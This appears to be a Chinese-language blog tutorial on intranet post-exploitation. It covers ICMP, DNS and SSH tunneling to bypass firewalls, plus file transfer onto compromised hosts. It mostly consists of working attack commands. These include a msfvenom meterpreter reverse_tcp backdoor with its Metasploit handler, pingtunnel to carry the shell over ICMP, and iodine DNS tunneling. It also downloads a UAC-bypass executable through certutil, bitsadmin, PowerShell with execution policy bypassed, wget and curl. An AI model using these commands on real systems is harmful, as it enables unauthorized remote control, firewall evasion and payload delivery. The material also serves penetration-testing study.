内网安全-隧道技术-防火墙限制协议绕过-文件传输

隧道技术:

 

一种通过使用互联网络基础设施在网络之间传递数据的方式,包括数据封装、

传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。

封装:

隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。

新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递

传输:

被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。

被封装的数据包在公共互联网络上传递时所经过的逻辑路径称为隧道

解包:

一旦到达网络终点,数据将被解包并转发到最终目的地

解决:

利用各种隧道技术,以网络防火墙允许的协议,

绕过网络防火墙的封锁,实现访问被封锁的目标网络

常见隧道:

网络层:IPv6 隧道、ICMP 隧道

传输层:TCP 隧道、UDP 隧道、常规端口转发

应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

常见隧道工具:

ICMP隧道工具:icmpsh pingtunnel icmptunnel

DNS隧道工具:dnscat2 iodine

SSH隧道工具:Linux ssh

IPV6隧道工具:socat 6tunnel nt6tunnel

Socks代理工具:Sockscap Proxifier Proxychains

综合穿透平台:Ngrok Frp SPP Nps(麻烦) EW(停更)

端口转发:lcx netsh portfwd

ICMP隧道-防火墙-Pingtunnel&Msf上线

环境:Win主机被防火墙限制出网,只让ICMP协议通讯

解决:实现将Win主机进行CS或MSF控制便于后续安全测试

https://github.com/esrrhs/pingtunnel

判断出网:ping www.baidu.com

Kali生成后门:

内网安全-隧道技术-防火墙限制协议绕过-文件传输_第1张图片

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe > xd.exe

MSF启动监听:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 4444

exploit

Kali开启隧道:

./pingtunnel -type server

内网安全-隧道技术-防火墙限制协议绕过-文件传输_第2张图片

Win开启隧道 //将本地3333 icmp数据转发至158的4444 tcp流量上

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 攻击机IP -t 攻击机IP:4444 -tcp 1

内网安全-隧道技术-防火墙限制协议绕过-文件传输_第3张图片

 运行生成的xd.exe,把本地127.0.0.1的3333端口的icmp数据转发到攻击机的4444端口的TCP流量上。内网安全-隧道技术-防火墙限制协议绕过-文件传输_第4张图片

DNS隧道-防火墙-VPS&iodined&CS上线

环境:内网主机只出网DNS协议数据

解决1:服务器尝试SSH协议连接客户端绕过限制

解决2:上线CS DNS协议 

https://github.com/yarrick/iodine

判断出网:nslookup www.baidu.com

服务器:iodined -f -c -P xxxx 192.168.0.1 ns1.xxxxx.com -DD

尝试连接:ssh [email protected]

设置密码xxxx并创建虚拟IP及绑定域名指向

客户端:iodine -f -P xxxx ns1.xxxxx.com

连接密码xxxx并绑定域名指向

SSH隧道-防火墙-本地&远程转发数据通讯

环境:内网Kali2021被防火墙拒绝协议连接

开启ssh协议登录:

vi /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes

/etc/init.d/ssh start

/etc/init.d/ssh restart

防火墙限制:

iptables -A INPUT -p tcp -s 192.168.46.158 -j DROP

本地转发:

kali2021 //将跳板131访问130流量给本地1122端口

ssh -CfNg -L 1122:192.168.46.130:22 [email protected]

ssh [email protected] -p 1122

远程转发://将本地访问130流量转发给158上1234端口

kali2020

ssh -CfNg -R 1234:192.168.46.130:22 [email protected]

kali2021

ssh [email protected] -p 1234

#文件传输-内网域-Win&Linux自带&上传下载

Linux:nc wget curl

windows:ftp vbs powershell certutil bitsadmin

https://blog.csdn.net/qq_36374896/article/details/84350015

vbs:不推荐

ftp:ftp -s:ftp.txt

bitsadmin:bitsadmin /transfer n http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe

certutil -urlcache -split -f http://192.168.0.101:8081/DccwBypassUAC.exe c:\DccwBypassUAC.exe

powershell -exec bypass -c (New-Object System.Net.WebClient).DownloadFile('http://192.168.0.101:8081/DccwBypassUAC.exe','c:\DccwBypassUAC.exe')

nc:不推荐

wget http://192.168.0.101:8081/DccwBypassUAC.exe

curl http://192.168.0.101:8081/DccwBypassUAC.exe --output myphp.php

思维导图补充:内网-隧道穿透-ICMP-DNS-SSH-文件传输 - 完全免费的思维导图软件 - 知犀官网知犀官网在线思维导图工具提供:思维导图在线制作,并提供思维导图文件大纲、分享、下载、云存储等实用功能。icon-default.png?t=M3C8https://www.zhixi.com/view/9a0884f2

你可能感兴趣的:(内网安全,web安全,服务器,数据库,database)